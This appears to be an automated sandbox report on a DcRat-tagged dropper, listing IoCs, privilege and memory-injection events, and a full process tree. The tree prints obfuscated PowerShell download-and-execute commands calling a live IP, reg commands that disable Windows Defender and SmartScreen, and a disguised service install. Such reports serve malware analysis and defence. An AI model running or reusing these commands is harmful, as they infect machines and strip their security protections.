Creates scheduled task(s) 1 TTPs 22 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid process
4956 schtasks.exe
5224 schtasks.exe
4488 schtasks.exe
4548 schtasks.exe
4592 schtasks.exe
4712 schtasks.exe
5016 schtasks.exe
4516 schtasks.exe
4468 schtasks.exe
4520 schtasks.exe
4948 schtasks.exe
5000 schtasks.exe
4984 schtasks.exe
4568 schtasks.exe
4904 schtasks.exe
5104 schtasks.exe
5384 schtasks.exe
3176 schtasks.exe
4788 schtasks.exe
6076 schtasks.exe
1448 schtasks.exe
5392 schtasks.exe
Delays execution with timeout.exe 5 IoCs
Processes:
pid | process
5056 | timeout.exe
5160 | timeout.exe
4544 | timeout.exe
4256 | timeout.exe
1332 | timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
pid | process
1404 | tasklist.exe
5064 | tasklist.exe
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Kills process with taskkill 3 IoCs
Processes:
pid | process
5580 | taskkill.exe
6008 | taskkill.exe
3880 | taskkill.exe
Modifies registry class 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings | 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | arnatic_1.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | arnatic_1.exe
Runs .reg file with regedit 1 IoCs
Processes:
pid | process
4108 | Regedit.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
1660 | arnatic_2.exe
1660 | arnatic_2.exe
2252 | jfiag3g_gg.exe
2252 | jfiag3g_gg.exe
3020 | (no process name recorded; 28 consecutive entries)
2072 | 8zeYyAhCLyy4MXuHDcnSZuq6.exe
3020 | (no process name recorded; 31 consecutive entries)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
3020 | (no process name recorded)
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pid | process
1660 | arnatic_2.exe
1968 | AFC2.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3700 | arnatic_5.exe
Token: SeDebugPrivilege | 2120 | MSBuild.exe
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeDebugPrivilege | 2072 | 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Token: SeDebugPrivilege | 3192 | arnatic_7.exe
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeDebugPrivilege | 4336 | d3381037-203a-43e3-9362-b9ca4e152f72.exe
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeDebugPrivilege | 4548 | 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeDebugPrivilege | 5080 | WaaSMedicAgent.exe
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeDebugPrivilege | 4200 | ETuSLYkVQqOjTT_usPKsVG0_.exe
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeDebugPrivilege | 1600 | ZxU30FwtSCAQFKpXqBqFaTKQ.exe
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeDebugPrivilege | 5268 | powershell.exe
Token: SeDebugPrivilege | 3848 | powershell.exe
Token: SeDebugPrivilege | 5344 | powershell.exe
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeDebugPrivilege | 5440 | powershell.exe
Token: SeShutdownPrivilege | 3020 |
Token: SeCreatePagefilePrivilege | 3020 |
Token: SeShutdownPrivilege | 3020 |
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
pid | process
4220 | Accostarmi.exe.pif
3020 |
3020 |
4220 | Accostarmi.exe.pif
4220 | Accostarmi.exe.pif
3020 |
3020 |
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
pid | process
4220 | Accostarmi.exe.pif
4220 | Accostarmi.exe.pif
4220 | Accostarmi.exe.pif
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
pid | process
2072 | 8zeYyAhCLyy4MXuHDcnSZuq6.exe
4548 | 8zeYyAhCLyy4MXuHDcnSZuq6.exe
5080 | WaaSMedicAgent.exe
1632 | AeDLshJf0BYumx9Wg7E57LU8.exe
5080 | WaaSMedicAgent.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 2388 wrote to memory of 3808 | 2388 | 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe | setup_installer.exe
PID 2388 wrote to memory of 3808 | 2388 | 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe | setup_installer.exe
PID 2388 wrote to memory of 3808 | 2388 | 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe | setup_installer.exe
PID 3808 wrote to memory of 3532 | 3808 | setup_installer.exe | setup_install.exe
PID 3808 wrote to memory of 3532 | 3808 | setup_installer.exe | setup_install.exe
PID 3808 wrote to memory of 3532 | 3808 | setup_installer.exe | setup_install.exe
PID 3532 wrote to memory of 648 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 648 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 648 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 2748 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 2748 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 2748 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 2776 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 2776 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 2776 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 2672 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 2672 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 2672 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 3868 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 3868 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 3868 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 3872 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 3872 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 3872 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 3852 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 3852 | 3532 | setup_install.exe | cmd.exe
PID 3532 wrote to memory of 3852 | 3532 | setup_install.exe | cmd.exe
PID 3852 wrote to memory of 2940 | 3852 | cmd.exe | arnatic_7.exe
PID 3852 wrote to memory of 2940 | 3852 | cmd.exe | arnatic_7.exe
PID 3852 wrote to memory of 2940 | 3852 | cmd.exe | arnatic_7.exe
PID 3868 wrote to memory of 3700 | 3868 | cmd.exe | arnatic_5.exe
PID 3868 wrote to memory of 3700 | 3868 | cmd.exe | arnatic_5.exe
PID 2672 wrote to memory of 1900 | 2672 | cmd.exe | arnatic_4.exe
PID 2672 wrote to memory of 1900 | 2672 | cmd.exe | arnatic_4.exe
PID 2672 wrote to memory of 1900 | 2672 | cmd.exe | arnatic_4.exe
PID 3872 wrote to memory of 2136 | 3872 | cmd.exe | arnatic_6.exe
PID 3872 wrote to memory of 2136 | 3872 | cmd.exe | arnatic_6.exe
PID 3872 wrote to memory of 2136 | 3872 | cmd.exe | arnatic_6.exe
PID 2748 wrote to memory of 1660 | 2748 | cmd.exe | arnatic_2.exe
PID 2748 wrote to memory of 1660 | 2748 | cmd.exe | arnatic_2.exe
PID 2748 wrote to memory of 1660 | 2748 | cmd.exe | arnatic_2.exe
PID 648 wrote to memory of 3528 | 648 | cmd.exe | arnatic_1.exe
PID 648 wrote to memory of 3528 | 648 | cmd.exe | arnatic_1.exe
PID 648 wrote to memory of 3528 | 648 | cmd.exe | arnatic_1.exe
PID 2776 wrote to memory of 2072 | 2776 | cmd.exe | arnatic_3.exe
PID 2776 wrote to memory of 2072 | 2776 | cmd.exe | arnatic_3.exe
PID 2776 wrote to memory of 2072 | 2776 | cmd.exe | arnatic_3.exe
PID 2940 wrote to memory of 3192 | 2940 | arnatic_7.exe | arnatic_7.exe
PID 2940 wrote to memory of 3192 | 2940 | arnatic_7.exe | arnatic_7.exe
PID 2940 wrote to memory of 3192 | 2940 | arnatic_7.exe | arnatic_7.exe
PID 1900 wrote to memory of 776 | 1900 | arnatic_4.exe | jfiag3g_gg.exe
PID 1900 wrote to memory of 776 | 1900 | arnatic_4.exe | jfiag3g_gg.exe
PID 1900 wrote to memory of 776 | 1900 | arnatic_4.exe | jfiag3g_gg.exe
PID 2072 wrote to memory of 1060 | 2072 | 8zeYyAhCLyy4MXuHDcnSZuq6.exe | rUNdlL32.eXe
PID 2072 wrote to memory of 1060 | 2072 | 8zeYyAhCLyy4MXuHDcnSZuq6.exe | rUNdlL32.eXe
PID 2072 wrote to memory of 1060 | 2072 | 8zeYyAhCLyy4MXuHDcnSZuq6.exe | rUNdlL32.eXe
PID 2940 wrote to memory of 3192 | 2940 | arnatic_7.exe | arnatic_7.exe
PID 2940 wrote to memory of 3192 | 2940 | arnatic_7.exe | arnatic_7.exe
PID 2940 wrote to memory of 3192 | 2940 | arnatic_7.exe | arnatic_7.exe
PID 2940 wrote to memory of 3192 | 2940 | arnatic_7.exe | arnatic_7.exe
PID 2940 wrote to memory of 3192 | 2940 | arnatic_7.exe | arnatic_7.exe
PID 1900 wrote to memory of 2252 | 1900 | arnatic_4.exe | jfiag3g_gg.exe
PID 1900 wrote to memory of 2252 | 1900 | arnatic_4.exe | jfiag3g_gg.exe
PID 1900 wrote to memory of 2252 | 1900 | arnatic_4.exe | jfiag3g_gg.exe
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
pid | process
2744 | attrib.exe
1324 | attrib.exe
776 | attrib.exe
Processes (tree depth in brackets; each entry is the image path followed by its command line)
- [1] C:\Users\Admin\AppData\Local\Temp\8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe  "C:\Users\Admin\AppData\Local\Temp\8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe"
  - DcRat
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - [2] C:\Users\Admin\AppData\Local\Temp\setup_installer.exe  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe  "C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c arnatic_2.exe
        - Suspicious use of WriteProcessMemory
        - [5] C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_2.exe  arnatic_2.exe
          - Executes dropped EXE
          - Loads dropped DLL
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: MapViewOfSection
      - [4] C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c arnatic_6.exe
        - Suspicious use of WriteProcessMemory
        - [5] C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_6.exe  arnatic_6.exe
          - Executes dropped EXE
          - Checks computer location settings
          - [6] C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe  "C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe"
            - DcRat
            - Executes dropped EXE
            - Checks computer location settings
            - Adds Run key to start application
            - Drops file in System32 directory
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Modifies registry class
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory
            - [7] C:\Windows\SysWOW64\cmd.exe  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yfXLZxBfsx.bat"
              - [8] C:\Windows\SysWOW64\w32tm.exe  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                - [9] C:\Windows\system32\w32tm.exe  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              - [8] C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe  "C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe"
                - Executes dropped EXE
                - Checks computer location settings
                - Adds Run key to start application
                - Drops file in System32 directory
                - Suspicious use of NtSetInformationThreadHideFromDebugger
                - Drops file in Program Files directory
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of SetWindowsHookEx
                - [9] C:\Documents and Settings\WaaSMedicAgent.exe  "C:\Documents and Settings\WaaSMedicAgent.exe"
                  - Executes dropped EXE
                  - Suspicious use of NtSetInformationThreadHideFromDebugger
                  - Suspicious use of AdjustPrivilegeToken
                  - Suspicious use of SetWindowsHookEx
          - [6] C:\Users\Admin\Documents\HZ0653dQL6eKaM3PHHhKvs1i.exe  "C:\Users\Admin\Documents\HZ0653dQL6eKaM3PHHhKvs1i.exe"
            - [7] C:\Users\Admin\AppData\Local\Temp\d3381037-203a-43e3-9362-b9ca4e152f72.exe  "C:\Users\Admin\AppData\Local\Temp\d3381037-203a-43e3-9362-b9ca4e152f72.exe"
              - Executes dropped EXE
              - Checks processor information in registry
              - Suspicious use of AdjustPrivilegeToken
          - [6] C:\Users\Admin\Documents\4_yza4q88bogYk_cF59XJjyz.exe  "C:\Users\Admin\Documents\4_yza4q88bogYk_cF59XJjyz.exe"
            - Executes dropped EXE
            - Checks processor information in registry
            - [7] C:\Windows\SysWOW64\rundll32.exe  "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
              - Blocklisted process makes network request
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 600
              - Program crash
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 944
              - Program crash
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 952
              - Program crash
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 1036
              - Program crash
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 868
              - Program crash
          - [6] C:\Users\Admin\Documents\ETuSLYkVQqOjTT_usPKsVG0_.exe  "C:\Users\Admin\Documents\ETuSLYkVQqOjTT_usPKsVG0_.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - Adds Run key to start application
            - Suspicious use of SetThreadContext
            - Suspicious use of AdjustPrivilegeToken
            - [7] C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe  "C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
            - [7] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            - [7] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            - [7] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
          - [6] C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe  "C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - [7] C:\Windows\SysWOW64\cmd.exe  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uefifces\
            - [7] C:\Windows\SysWOW64\cmd.exe  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ezokegez.exe" C:\Windows\SysWOW64\uefifces\
            - [7] C:\Windows\SysWOW64\sc.exe  "C:\Windows\System32\sc.exe" create uefifces binPath= "C:\Windows\SysWOW64\uefifces\ezokegez.exe /d\"C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe\"" type= own start= auto DisplayName= "wifi support"
            - [7] C:\Windows\SysWOW64\sc.exe  "C:\Windows\System32\sc.exe" description uefifces "wifi internet conection"
            - [7] C:\Windows\SysWOW64\sc.exe  "C:\Windows\System32\sc.exe" start uefifces
            - [7] C:\Windows\SysWOW64\netsh.exe  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1260
              - Program crash
          - [6] C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe  "C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1308
              - Program crash
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1316
              - Program crash
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1384
              - Program crash
            - [7] C:\Windows\SysWOW64\cmd.exe  "C:\Windows\System32\cmd.exe" /c taskkill /im "hO5xKfTb0uXbbkS86n6An9zN.exe" /f & erase "C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe" & exit
              - [8] C:\Windows\SysWOW64\taskkill.exe  taskkill /im "hO5xKfTb0uXbbkS86n6An9zN.exe" /f
                - Kills process with taskkill
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1360
              - Program crash
          - [6] C:\Users\Admin\Documents\TovKtHieW7V9aCT7Dk2QoIn9.exe  "C:\Users\Admin\Documents\TovKtHieW7V9aCT7Dk2QoIn9.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Checks processor information in registry
          - [6] C:\Users\Admin\Documents\GlMzB0cjitEHTuadmoJgQMmB.exe  "C:\Users\Admin\Documents\GlMzB0cjitEHTuadmoJgQMmB.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - [7] C:\Windows\SysWOW64\cmd.exe  "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
              - [8] C:\Windows\SysWOW64\cmd.exe  cmd
                - [9] C:\Windows\SysWOW64\tasklist.exe  tasklist /FI "imagename eq BullGuardCore.exe"
                  - Enumerates processes with tasklist
                - [9] C:\Windows\SysWOW64\find.exe  find /I /N "bullguardcore.exe"
                - [9] C:\Windows\SysWOW64\tasklist.exe  tasklist /FI "imagename eq PSUAService.exe"
                  - Enumerates processes with tasklist
                - [9] C:\Windows\SysWOW64\find.exe  find /I /N "psuaservice.exe"
                - [9] C:\Windows\SysWOW64\findstr.exe  findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                - [9] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif  Accostarmi.exe.pif N
                  - Executes dropped EXE
                  - Suspicious use of FindShellTrayWindow
                  - Suspicious use of SendNotifyMessage
          - [6] C:\Users\Admin\Documents\AeDLshJf0BYumx9Wg7E57LU8.exe  "C:\Users\Admin\Documents\AeDLshJf0BYumx9Wg7E57LU8.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - Suspicious use of SetWindowsHookEx
            - [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
              - Blocklisted process makes network request
              - Adds Run key to start application
              - Suspicious use of AdjustPrivilegeToken
              - [8] C:\Windows\SysWOW64\svchost.exe  "C:\Windows\System32\svchost.exe"
                - [9] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 452
                  - Program crash
            - [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
              - Blocklisted process makes network request
              - Suspicious use of SetThreadContext
              - Suspicious use of AdjustPrivilegeToken
              - [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            - [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
              - Blocklisted process makes network request
              - Suspicious use of AdjustPrivilegeToken
              - [8] C:\Windows\SysWOW64\cmd.exe  "C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
                - [9] C:\Windows\SysWOW64\attrib.exe  attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
                  - Views/modifies file attributes
              - [8] C:\Windows\SysWOW64\cmd.exe  "C:\Windows\system32\cmd.exe" /c attrib +s +h C:\ProgramData\OneDrive
                - [9] C:\Windows\SysWOW64\attrib.exe  attrib +s +h C:\ProgramData\OneDrive
                  - Views/modifies file attributes
              - [8] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -exec bypass start-process C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs
                - [9] C:\Windows\SysWOW64\WScript.exe  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs"
                  - [10] C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\OneDrive\Offer.bat" "
                    - [11] C:\Users\Admin\AppData\Roaming\OneDrive\Offer.exe  Offer.exe
                    - [11] C:\Windows\SysWOW64\timeout.exe  timeout /t 4
                      - Delays execution with timeout.exe
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f
                    - [11] C:\Windows\SysWOW64\takeown.exe  takeown /f "C:\Windows\System32\smartscreen.exe" /a
                      - Possible privilege escalation attempt
                      - Modifies file permissions
